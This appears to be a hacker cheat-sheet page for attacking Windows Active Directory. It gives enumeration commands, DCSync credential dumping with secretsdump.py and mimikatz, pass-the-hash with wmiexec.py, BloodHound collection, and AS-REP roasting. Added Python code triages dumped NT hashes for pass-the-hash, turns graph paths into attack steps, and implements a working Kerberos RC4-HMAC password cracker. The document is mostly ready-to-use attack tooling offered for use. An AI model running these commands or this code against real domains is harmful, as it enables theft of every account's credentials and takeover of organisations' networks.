d4Rk's 1337 h4x0r guide
Active Directory

Last updated 2 years ago

Active Directory is a directory service developed by Microsoft for Windows domain networks. It is included in most Windows Server operating systems as a set of processes and services. Initially, Active Directory was only in charge of centralized domain management.

--

Target

  • Domain Admins group

  • Domain Controller

General

Display permissions (ACLs) on the domain object with dsacls (an RSAT tool, present on DCs; runs from cmd or PowerShell). The DN is the domain's DNS name split into DC= parts, e.g. corp.local -> "DC=corp,DC=local"

dsacls "DC=<domain>,DC=<tld>"

net

List local accounts

net user

List domain accounts

net user /domain

Details about specific user

net user <user> /domain

List domain groups

net group /domain

Show the domain's account policy (lockout threshold, password length, etc.; without /domain only the local policy is shown)

net accounts /domain

DC sync attack

Needs an account holding the replication rights on the domain object (DS-Replication-Get-Changes and DS-Replication-Get-Changes-All); Domain Admins and DC machine accounts have them by default. Impacket's secretsdump.py then pulls every NT hash from NTDS.DIT over DRSUAPI (add -just-dc-ntlm to skip the SAM/LSA secrets and Kerberos keys), and wmiexec.py reuses one of them as pass-the-hash:

secretsdump.py <domain>/<user>:<pw>@<ip>
wmiexec.py <domain>/<user>@<ip> -hashes "<lmhash>:<nthash>"

Alternative approach (probably gets flagged by AV): copy & execute mimikatz.exe on the DC. It does not have to be the DC, any domain host works as long as the calling account has the replication rights.

lsadump::dcsync /domain:<domain> /user:<user>
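Once the dump is in hand the first questions are who shares a password, who has none, and which LM:NT pair to feed to -hashes. The following Python triage of secretsdump.py output is an added example, not code from this guide or from Impacket: it parses the `domain\user:rid:lmhash:nthash:::` lines, drops machine accounts and password-history entries, groups live users by NT hash, flags the well-known empty-password hash, and builds the `LM:NT` argument. The dump text is constructed to look like secretsdump output; the domain CORP, its accounts and their hashes are made up (8846f7... is NT("password"), so the sample admin is also trivially crackable).

```python
import re
from collections import defaultdict

# NT hash of the empty password, MD4(UTF-16LE("")): an account carrying it has no password set.
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# One NTDS line as secretsdump.py prints it: domain\user:rid:lmhash:nthash:::
NTDS_LINE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-f]{32}):(?P<nt>[0-9a-f]{32}):::$")

# Constructed sample shaped like secretsdump.py output; every account and hash is made up
# (the LM value is the usual "no LM hash stored" placeholder, aad3b435b51404eeaad3b435b51404ee).
SAMPLE_DUMP = r"""
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
CORP\Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
CORP\Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
CORP\krbtgt:502:aad3b435b51404eeaad3b435b51404ee:4f3c0d1e2a5b6c7d8e9f0a1b2c3d4e5f:::
CORP\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
CORP\jdoe:1108:aad3b435b51404eeaad3b435b51404ee:a1b2c3d4e5f60718293a4b5c6d7e8f90:::
CORP\jdoe_history0:1108:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::
CORP\DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
[*] Kerberos keys grabbed
CORP\Administrator:aes256-cts-hmac-sha1-96:e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3e3
[*] Cleaning up...
"""


def parse_secretsdump(text):
    """Return one dict per NTDS hash line; banners and Kerberos key lines are skipped."""
    creds = []
    for line in text.splitlines():
        m = NTDS_LINE.match(line.strip())
        if m:
            c = m.groupdict()
            c["rid"] = int(c["rid"])
            c["machine"] = c["user"].endswith("$")   # computer / DC accounts
            c["history"] = "_history" in c["user"]   # old passwords (secretsdump -history)
            creds.append(c)
    return creds


def triage(creds):
    """Group live user accounts by NT hash: a shared hash is a shared password."""
    by_nt = defaultdict(list)
    for c in creds:
        if not c["machine"] and not c["history"]:
            by_nt[c["nt"]].append(c["user"])
    return {
        "reused": {nt: users for nt, users in by_nt.items() if len(users) > 1},
        "empty_password": by_nt.get(EMPTY_NT, []),
    }


def pth_hashes(creds, user):
    """The -hashes value wmiexec.py / psexec.py / secretsdump.py expect: LMHASH:NTHASH."""
    for c in creds:
        if c["user"].lower() == user.lower() and not c["history"]:
            return "%s:%s" % (c["lm"], c["nt"])
    raise KeyError("no NTDS entry for %s" % user)


if __name__ == "__main__":
    creds = parse_secretsdump(SAMPLE_DUMP)
    print(triage(creds))
    print("wmiexec.py CORP/Administrator@<ip> -hashes", pth_hashes(creds, "Administrator"))
```

The reuse check is the one worth running first: a service account sharing the Administrator hash (as in the sample) is a quieter path than the built-in admin, and the krbtgt hash from the same dump is what a golden ticket is forged from.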

BloodHound

Gather information

From kali, remotely against the DC (needs valid domain credentials and a nameserver that resolves the domain, i.e. the DC; the JSON files land in the current directory, add --zip to bundle them):

pip3 install bloodhound
bloodhound-python -u <username> -p <password> -ns <nameserver> -d <domain> -c All

OR on a domain-joined Windows host (on target):

.\SharpHound.exe -c all -d <domain> --domaincontroller <dc-ip>

Copy the generated *_BloodHound.zip to kali

OR (PowerShell version, dot-source it first)

. .\SharpHound.ps1
Invoke-BloodHound -Domain <domain> -LDAPUser <user> -LDAPPass <pass> -CollectionMethod All -DomainController <dc-ip>

Analyze data (on kali)

neo4j console
bloodhound

Connect to database

bolt://localhost:7687
neo4j
<PW>

Import data: Upload Data, then select the .csv, .json or .zip file(s)
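What the GUI does once the data is in Neo4j is a shortest-path search over a directed graph whose edges are AD relationships. The Python below is an added illustration of that, not BloodHound's own code or a real collection: a constructed edge list in BloodHound's edge vocabulary (MemberOf, AdminTo, HasSession), a breadth-first shortest path to the Domain Admins group, and the operator action each edge implies. Every principal and host name (CORP.LOCAL, BOB, JDOE, WS01, ...) is made up.

```python
from collections import defaultdict, deque

# Constructed edge list using BloodHound's edge names (not data from a real SharpHound run):
#   MemberOf   - principal is a member of the group (chains give nested membership)
#   AdminTo    - principal is a local administrator on the computer
#   HasSession - the user has a logged-on session on the computer (its credentials sit in LSASS)
EDGES = [
    ("BOB@CORP.LOCAL", "MemberOf", "IT_HELPDESK@CORP.LOCAL"),
    ("IT_HELPDESK@CORP.LOCAL", "AdminTo", "WS01.CORP.LOCAL"),
    ("WS01.CORP.LOCAL", "HasSession", "JDOE@CORP.LOCAL"),
    ("JDOE@CORP.LOCAL", "MemberOf", "DOMAIN ADMINS@CORP.LOCAL"),
    ("ALICE@CORP.LOCAL", "MemberOf", "SALES@CORP.LOCAL"),
    ("SALES@CORP.LOCAL", "AdminTo", "WS02.CORP.LOCAL"),
    ("WS02.CORP.LOCAL", "HasSession", "ALICE@CORP.LOCAL"),   # a cycle, no way up from here
]
DOMAIN_ADMINS = "DOMAIN ADMINS@CORP.LOCAL"


def build_graph(edges):
    """Directed adjacency list: node -> [(edge_type, neighbour), ...]."""
    adj = defaultdict(list)
    for src, rel, dst in edges:
        adj[src].append((rel, dst))
    return adj


def shortest_path(adj, start, goal):
    """Breadth-first search; returns the edge chain [(src, rel, dst), ...] or None.
    Equivalent to the 'Shortest Paths to Domain Admins' query BloodHound runs in Neo4j."""
    prev = {start: None}
    queue = deque([start])
    while queue:
        node = queue.popleft()
        if node == goal:
            chain = []
            while prev[node] is not None:
                parent, rel = prev[node]
                chain.append((parent, rel, node))
                node = parent
            return chain[::-1]
        for rel, nxt in adj.get(node, ()):
            if nxt not in prev:          # first visit is the shortest in an unweighted graph
                prev[nxt] = (node, rel)
                queue.append(nxt)
    return None


def attack_plan(chain):
    """Translate each edge of a path into the step an operator would take."""
    actions = {
        "MemberOf": "inherit the group's rights (nothing to do)",
        "AdminTo": "execute as SYSTEM on the host (e.g. wmiexec.py, then dump LSASS)",
        "HasSession": "steal that user's credentials or token from the host",
    }
    return ["%s -[%s]-> %s: %s" % (s, r, d, actions[r]) for s, r, d in chain]


def users_with_path(adj, users, goal=DOMAIN_ADMINS):
    """Which of the given users have any path to the goal group."""
    found = {}
    for u in users:
        p = shortest_path(adj, u, goal)
        if p is not None:
            found[u] = p
    return found


if __name__ == "__main__":
    g = build_graph(EDGES)
    for step in attack_plan(shortest_path(g, "BOB@CORP.LOCAL", DOMAIN_ADMINS)):
        print(step)
```

In the GUI the same question is the raw Cypher query `MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@CORP.LOCAL"})) RETURN p`; the point of the toy is that every hop you see there is an action, and the HasSession hop is the one that usually needs local admin first.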

Pre-Auth attack

1. Sniff a Kerberos AS-REQ that carries pre-authentication: the PA-ENC-TIMESTAMP inside it is encrypted with the user's password-derived key
2. Crack it using hashcat (mode 7500, Kerberos 5 etype 23 AS-REQ Pre-Auth)

-> If no pre-auth is required for the account (DONT_REQ_PREAUTH set), there is nothing to sniff: just use Impacket (GetNPUsers.py) to pull the AS-REP hashes from AD and crack those with hashcat (mode 18200, Kerberos 5 etype 23 AS-REP).
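Both variants rest on the same RC4-HMAC (etype 23) construction from RFC 4757, only the key usage number differs: 1 for the PA-ENC-TIMESTAMP, 8 for the AS-REP enc-part as Windows KDCs (and hashcat -m 18200) use it. The Python below is an added worked example, not code from this guide, hashcat or Impacket: a pure-Python MD4 (so no OpenSSL legacy provider is needed for the NT hash) and RC4, the RFC 4757 encrypt/decrypt, a formatter for the `$krb5asrep$23$...` line that GetNPUsers.py prints and hashcat reads, and a dictionary cracker doing per candidate exactly what hashcat does. The account svc_backup, realm CORP.LOCAL, its password and the wordlist are constructed, and the "captured" enc-part is generated in the block rather than sniffed.

```python
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
KEY_USAGE_PA_ENC_TIMESTAMP = 1   # RFC 4120: AS-REQ PA-ENC-TIMESTAMP
KEY_USAGE_AS_REP = 8             # Windows KDCs use 8 for the AS-REP enc-part (RFC 4757 sec. 3)


def md4(data: bytes) -> bytes:
    """MD4 per RFC 1320 (the NT hash is MD4 over the UTF-16LE password)."""
    a0, b0, c0, d0 = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    msg = data + b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", 8 * len(data))
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    rounds = (  # (mixing function, additive constant, word order, rotation per step)
        (lambda x, y, z: (x & y) | (~x & z), 0, range(16), (3, 7, 11, 19)),
        (lambda x, y, z: (x & y) | (x & z) | (y & z), 0x5A827999,
         (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (lambda x, y, z: x ^ y ^ z, 0x6ED9EBA1,
         (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = a0, b0, c0, d0
        for fn, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + fn(b, c, d) + X[k] + const) & MASK, shifts[i % 4])
                a, b, c, d = d, a, b, c      # rotate so the next step updates the next register
        a0, b0, c0, d0 = (a0 + a) & MASK, (b0 + b) & MASK, (c0 + c) & MASK, (d0 + d) & MASK
    return struct.pack("<4I", a0, b0, c0, d0)


def nt_hash(password: str) -> bytes:
    """NT hash == the RC4-HMAC Kerberos key; no salt, which is why these attacks are cheap."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):                       # key scheduling
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                          # keystream generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def _hmac_md5(key: bytes, data: bytes) -> bytes:
    return hmac.new(key, data, hashlib.md5).digest()


def rc4_hmac_encrypt(key: bytes, usage: int, confounder: bytes, plaintext: bytes) -> bytes:
    """RFC 4757 etype 23: output = checksum(16) || RC4(K3, confounder || plaintext)."""
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = confounder + plaintext
    checksum = _hmac_md5(k1, data)
    return checksum + rc4(_hmac_md5(k1, checksum), data)


def rc4_hmac_decrypt(key: bytes, usage: int, enc: bytes):
    """Inverse; None when the checksum fails, i.e. the key (password guess) is wrong."""
    checksum, ciphertext = enc[:16], enc[16:]
    k1 = _hmac_md5(key, struct.pack("<I", usage))
    data = rc4(_hmac_md5(k1, checksum), ciphertext)
    if not hmac.compare_digest(_hmac_md5(k1, data), checksum):
        return None
    return data[8:]                            # drop the 8-byte confounder


def hashcat_asrep_line(user: str, realm: str, enc_part: bytes) -> str:
    """The layout GetNPUsers.py prints and hashcat -m 18200 reads: $krb5asrep$23$user@REALM:checksum$edata."""
    return "$krb5asrep$23$%s@%s:%s$%s" % (user, realm, enc_part[:16].hex(), enc_part[16:].hex())


def crack(enc_part: bytes, usage: int, wordlist):
    """Per candidate: NT hash -> decrypt -> accept if the checksum verifies (what hashcat does)."""
    for candidate in wordlist:
        if rc4_hmac_decrypt(nt_hash(candidate), usage, enc_part) is not None:
            return candidate
    return None


def crack_asrep(line: str, wordlist):
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) AS-REPs are handled here")
    _principal, rest = line[len(prefix):].split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return crack(bytes.fromhex(checksum_hex + edata_hex), KEY_USAGE_AS_REP, wordlist)


# Constructed sample: the enc-part a KDC would hand out for the hypothetical no-preauth account
# svc_backup (password Winter2019!). A real one starts with a random confounder followed by the
# DER EncASRepPart (tag 0x79); fixed bytes keep the example deterministic.
SAMPLE_ENC_PART = rc4_hmac_encrypt(nt_hash("Winter2019!"), KEY_USAGE_AS_REP,
                                   bytes(range(8)), b"\x79\x81\xc3\x30\x81\xc0" + b"\x00" * 40)
SAMPLE_LINE = hashcat_asrep_line("svc_backup", "CORP.LOCAL", SAMPLE_ENC_PART)
SAMPLE_WORDLIST = ["password", "Summer2019!", "Winter2019!", "Passw0rd"]

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_asrep(SAMPLE_LINE, SAMPLE_WORDLIST))
```

`crack()` with `KEY_USAGE_PA_ENC_TIMESTAMP` is the step-1/step-2 case: the sniffed PA-ENC-TIMESTAMP cipher (checksum || ciphertext, as Wireshark shows it) goes in as enc_part. The reason both are offline-crackable is visible in `nt_hash`: the key is unsalted MD4, so one MD4 plus one RC4 per guess is the whole cost.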

Related

  • Wikipedia: Active Directory
  • TCP 88: Kerberos
  • TCP 389, 636, 3268, 3269: LDAP
  • Impacket
  • PayloadsAllTheThings/Active Directory Attack.md at master · swisskyrepo/PayloadsAllTheThings · GitHub
  • DC Sync Attacks With Secretsdump.py - YouTube
  • Getting Passwords When Kerberos Pre-Auth IS Enabled - YouTube
  • GitHub - BloodHoundAD/BloodHound: BloodHound uses graph theory to reveal the hidden and often unintended relationships within an Active Directory environment.